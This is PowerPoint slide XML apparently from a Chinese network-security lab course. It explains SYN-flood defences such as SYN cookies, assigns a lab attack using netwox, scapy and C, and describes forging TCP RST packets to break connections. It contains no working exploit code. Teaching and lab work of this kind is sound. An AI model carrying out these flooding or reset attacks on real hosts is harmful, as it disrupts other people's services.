        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是否能连接到服务器？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原来的连接是否还保持？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、内存情况</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>top</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令查看</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87726616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zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SYN-Flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>攻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>击的防范措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567055" y="1752600"/>
            <a:ext cx="8001000" cy="4580890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>阻断新建连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>源地址过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>释放无效连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>监视系统的半开连接和不活动连接，超过阈值时释放</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>延缓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Transmission Control Block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）分配</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>丢包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SYN proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SYN cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自带防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syn-flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Safe reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYNCookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -w net.ipv4.tcp_syncookies=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull dir="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BFCD8F-8A4E-45C9-A434-42342260E0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN-Flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击实验任务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1A6644-2766-4ADC-B266-203141236198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8109718" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分别采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序实施攻击，观察攻击过程中，伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，目标主机的连接、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等情况</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>syn-cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>机制，用户主机是否还能访问目标主机的服务（比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>syn-cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>机制后，用户主机是否还能访问目标主机的服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891128762"/>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TCP Reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>TCP R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击可以终止两个受害者之间建立的TCP连接。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 例如，如果两个用户A和B之间存在已建立的telnet连接（TCP），则攻击者可以伪造一个从A到B的RST报文，从而破坏此现有连接。</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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>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en-US" sz="1200" dirty="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验目的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验环境</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验要求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报告提交</a:t>
            </a:r>
            <a:endParaRPr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slide(fromBottom)">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slide(fromBottom)">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slide(fromBottom)">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slide(fromBottom)">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slide(fromBottom)">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0C31A9-F33B-44E4-9E5B-F8010E781269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP Reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D5CB389-80DD-4E36-B7E4-2CF128A6ABF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="1844824"/>
            <a:ext cx="4968552" cy="4368899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D57F0204-A1E3-4A5C-AC27-EA4D395B49C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="2276872"/>
            <a:ext cx="1296144" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sip, dip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sport, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249109617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6FB06C-4965-4FEA-920C-F2ECD3BDA083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA211521-B2EB-44D0-A27A-11FF25E90EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>要成功进行此攻击，攻击者需要正确构建TCP RST数据包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F376E439-8193-491D-9C69-55C1747EF572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="2564904"/>
            <a:ext cx="5783287" cy="4176464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39232049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0706AC-64FE-4F68-9373-A9199B9246A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP Reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6859F84C-7A11-4B5D-81E7-4CCE071B2743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
